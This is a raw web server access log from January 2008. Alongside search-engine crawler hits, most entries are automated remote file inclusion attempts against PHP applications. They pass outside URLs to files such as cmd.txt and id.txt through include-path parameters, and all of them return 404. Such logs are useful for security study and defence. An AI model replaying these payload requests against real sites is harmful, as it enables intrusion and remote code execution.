87.106.46.84 - - [02/Jan/2008:08:35:11 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:08:35:11 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:08:35:12 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:08:35:43 -0800] "GET /retreat1/IMG_2708.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.39.193.102 - - [02/Jan/2008:08:35:56 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.39.193.102 - - [02/Jan/2008:08:35:56 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.39.193.102 - - [02/Jan/2008:08:35:56 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:08:36:08 -0800] "GET /retreat1/IMG_2696.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:08:36:29 -0800] "GET /retreat1/IMG_2777.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
64.246.15.59 - - [02/Jan/2008:08:39:27 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.freewebtown.com/aldirianto/tikam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [02/Jan/2008:08:39:27 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.freewebtown.com/aldirianto/tikam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.67.55.94 - - [02/Jan/2008:08:43:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.108.81.21 - - [02/Jan/2008:08:46:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.turnkey-innovations.net/allinone/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
78.108.81.21 - - [02/Jan/2008:08:46:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.turnkey-innovations.net/allinone/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
125.164.201.47 - - [02/Jan/2008:08:47:00 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.124.224.240 - - [02/Jan/2008:08:47:01 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.164.201.47 - - [02/Jan/2008:08:47:01 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.35 - - [02/Jan/2008:08:48:36 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.38 - - [02/Jan/2008:08:48:37 -0800] "GET /tmp/?D=A HTTP/1.0" 200 1153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:08:50:14 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:08:50:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:08:50:17 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:08:50:43 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:08:50:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:08:50:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.67.55.94 - - [02/Jan/2008:08:53:14 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.215.83 - - [02/Jan/2008:08:54:48 -0800] "GET /logs/omponents/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
205.234.215.83 - - [02/Jan/2008:08:54:48 -0800] "GET /omponents/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
59.148.232.33 - - [02/Jan/2008:08:58:26 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [02/Jan/2008:08:58:26 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [02/Jan/2008:08:58:26 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [02/Jan/2008:08:58:29 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [02/Jan/2008:08:58:29 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [02/Jan/2008:08:58:29 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [02/Jan/2008:08:58:30 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [02/Jan/2008:08:58:31 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [02/Jan/2008:08:58:31 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.6 - - [02/Jan/2008:08:59:29 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kennohost.ro/orders/admin/es.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
207.44.234.6 - - [02/Jan/2008:08:59:29 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kennohost.ro/orders/admin/es.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:09:01:00 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:09:01:02 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:09:01:02 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.197.104 - - [02/Jan/2008:09:01:51 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.80.197.104 - - [02/Jan/2008:09:01:51 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:09:01:56 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:09:01:57 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.109.21 - - [02/Jan/2008:09:01:59 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.164.201.47 - - [02/Jan/2008:09:06:26 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.225 - - [02/Jan/2008:09:07:03 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.80.197.104 - - [02/Jan/2008:09:13:00 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:09:18:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.209.205 - - [02/Jan/2008:09:18:42 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.205 - - [02/Jan/2008:09:18:42 -0800] "GET /tmp/ HTTP/1.0" 200 1150 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.41.174.211 - - [02/Jan/2008:09:21:56 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mondmurmel.de/alleswirdbesser/tool/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
69.41.174.211 - - [02/Jan/2008:09:21:56 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mondmurmel.de/alleswirdbesser/tool/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.6.24.10 - - [02/Jan/2008:09:24:43 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:09:27:29 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:09:31:43 -0800] "GET /retreat1/IMG_2679.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:09:32:07 -0800] "GET /retreat1/IMG_2702.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:09:33:09 -0800] "GET /retreat1/IMG_2685.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:09:34:29 -0800] "GET /retreat1/IMG_2754.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:09:34:52 -0800] "GET /retreat1/IMG_2741.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:09:35:49 -0800] "GET /retreat1/IMG_2752.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:09:36:06 -0800] "GET /retreat1/IMG_2739.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.19.139 - - [02/Jan/2008:09:43:29 -0800] "GET /minamijewelry/?D=D HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.208.68.5 - - [02/Jan/2008:09:51:28 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.68.5 - - [02/Jan/2008:09:51:28 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.25.73 - - [02/Jan/2008:09:58:32 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:10:07:34 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:10:07:35 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:10:07:35 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:10:10:17 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.66.124.141 - - [02/Jan/2008:10:11:12 -0800] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://kasyoder.org/media/System/log/Log??? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
74.6.19.169 - - [02/Jan/2008:10:13:46 -0800] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.67.55.94 - - [02/Jan/2008:10:17:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.105.154 - - [02/Jan/2008:10:17:50 -0800] "GET /logs/modifyform.html?code=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.105.154 - - [02/Jan/2008:10:17:50 -0800] "GET /modifyform.html?code=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.26.63.12 - - [02/Jan/2008:10:18:00 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [02/Jan/2008:10:18:00 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [02/Jan/2008:10:18:00 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [02/Jan/2008:10:18:30 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.105.154 - - [02/Jan/2008:10:19:08 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.67.55.94 - - [02/Jan/2008:10:19:09 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.12 - - [02/Jan/2008:10:25:50 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [02/Jan/2008:10:25:50 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [02/Jan/2008:10:25:50 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.67.55.94 - - [02/Jan/2008:10:26:21 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [02/Jan/2008:10:26:21 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [02/Jan/2008:10:26:35 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [02/Jan/2008:10:26:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:10:31:17 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:10:33:12 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:10:33:12 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:10:33:12 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.57.41 - - [02/Jan/2008:10:34:06 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.57.41 - - [02/Jan/2008:10:34:06 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.51.221.90 - - [02/Jan/2008:10:38:38 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.brockwhite.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
211.51.221.90 - - [02/Jan/2008:10:38:38 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.brockwhite.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
211.51.221.90 - - [02/Jan/2008:10:38:49 -0800] "GET //surveys/survey.inc.php?path=http://www.brockwhite.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
211.51.221.90 - - [02/Jan/2008:10:38:50 -0800] "GET /logs//surveys/survey.inc.php?path=http://www.brockwhite.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
65.55.209.207 - - [02/Jan/2008:10:39:18 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [02/Jan/2008:10:39:18 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:40:33 -0800] "GET /logs/access_071219.log//reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:40:33 -0800] "GET //reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:40:34 -0800] "GET /logs//reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:40:49 -0800] "GET /logs/access_071219.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:40:49 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:40:49 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:42:56 -0800] "GET /logs/access_071214.log//reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:42:57 -0800] "GET /logs/access_071214.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:43:40 -0800] "GET /logs/access_071219.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:43:40 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:43:40 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:44:51 -0800] "GET /logs/access_071219.log//reports/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
